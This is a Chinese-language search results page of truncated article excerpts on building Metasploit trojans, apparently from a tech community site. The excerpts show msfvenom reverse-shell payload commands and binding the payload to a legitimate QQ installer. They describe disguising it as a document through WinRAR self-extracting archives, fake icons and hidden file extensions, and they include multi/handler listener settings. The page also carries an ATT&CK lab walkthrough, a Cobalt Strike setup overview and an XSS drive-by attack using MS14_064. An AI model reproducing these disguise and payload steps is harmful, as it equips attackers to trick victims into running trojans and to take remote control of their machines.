首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

msf木马程序

捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个...这里就不设置了,默认返回端口是4444 -f: 代表要捆绑的文件类型,这里是一个exe文件 -x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe -o:指定生成木马文件的路径及文件名...附:msfvenom介绍 msfvenom简介 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线...msfvenom生成 生成payload,有有两个必须的选项:-p和-f 使用-p来指定要使用的payload。...RAR有一个自解压的功能 我们可以利用这一点来达到目的 有两个文件,一个是刚刚生成木马文件,一个是一个txt文档 全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式 ?

1.9K62
您找到你想要的搜索结果了吗?
是的
没有找到

msf工具之木马程序制作以及伪装

本文转自行云博客https://www.xy586.top 文章目录 捆绑木马 RAR自动解压 捆绑木马 使用msfvenom制作木马程序: #生成木马文件 msfvenom -p windows...将木马文件放入靶机中 ?...multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.232.138 set lport 4444 run 将木马程序点击执行...RAR自动解压 设置自动解压运行 设置rar自动解压格式让它在解压时运行恶意程序 模拟文本文档钓鱼 改良木马程序: 伪装:将网页代码和app进行绑定,然后压缩,使用WinRAR创建自解压格式...文本和图标选项中,选择加载我们刚刚生成的icon图标 ? 生成了我们伪装过后的木马程序 ? 同时可以将文件名称改成比较长的名字,在不选中文件的时候,文件名后面部分会被隐藏,达到隐藏后缀名的效果

2.3K40

内网靶场实战——ATT&CK实战系列(四)

,接下来sessions 1 即可进入会话 方法二 除了利用冰蝎进行反弹shell,我们也可以通过生成msf木马,然后上传到服务器去执行来获取shell 具体如下 首先生成msf木马 msfvenom...GOARCH=amd64 go build main.go //编译生成 而后进入msf,将这个go文件进行上传 upload /tools/dockerrun/main 可以看到成功上传,接下来在...首先生成msf木马 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=7777 -f elf >shell.elf.../ew_for_linux64 -s rcsocks -l 1080 -e 1234 然后用python服务的方式,将ew_for_linux64上传至Ubuntu,而后执行 chmod +x ew_for_linux64...,关闭防火墙并执行木马文件即可实现msf上线 net use \\WIN-ENS2VR5TR3N\c$ //控制域成员与域控建立一个ipc链接 msf生成正向连接木马 msfvenom -p windows

73750

CS系列-CobaltStrike的安装搭建

Cobalt Strike 2.0版 本主要是结合Metasploit可以称为图形化MSF工具。...客户端模式和服务端模 式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有 可能会出现一些细小的问题不过影响不大。...Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe 木马生成,win dll木马生成,java木马生成,office宏病毒生成木马捆绑;钓鱼攻...CobaltStrike优点 ·Payload免杀优于Msf ·图形化界面方便操作 ·多人协同测试,高效合作 ·集成很多内网渗透工具及命令 ·可结合Msf联合使用 链接:https://pan.baidu.com...把linux的放到kali中,我放到opt目录下,这个一般都是存放软件的目录,然后unzip cobaltstrike-linux.zip解压 然后终端进入这个目录下,首先查看本机kali的ip地址,然后为一个文件提升下权限

6.6K20

【XSS漏洞】通过XSS实现网页挂马

实验分为两部分: 1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木马服务器,会造成缓冲区溢出,攻击者可以直接获取用户的系统Shell。...Kali linux 自带该工具,可直接使用。...2、MSF初始操作 启动msf:root@kali:~# msfconsole 初始化数据库:msf5 > msfdb init //数据库初始化后,msf查询速度会大幅提升 msf5 > db_status...powershell功能 设置木马服务器IP(Kali IP): msf5 exploit(ms14_064_ole_code_execution) > set srvhost 192.168.211.134...kali 的web服务已开启,并生成了一个URL:http://192.168.211.134:8080/Dyvk2r6MwyGc,一旦存在MS14_064漏洞的主机访问这个URL,就会被控制。

4.6K30
领券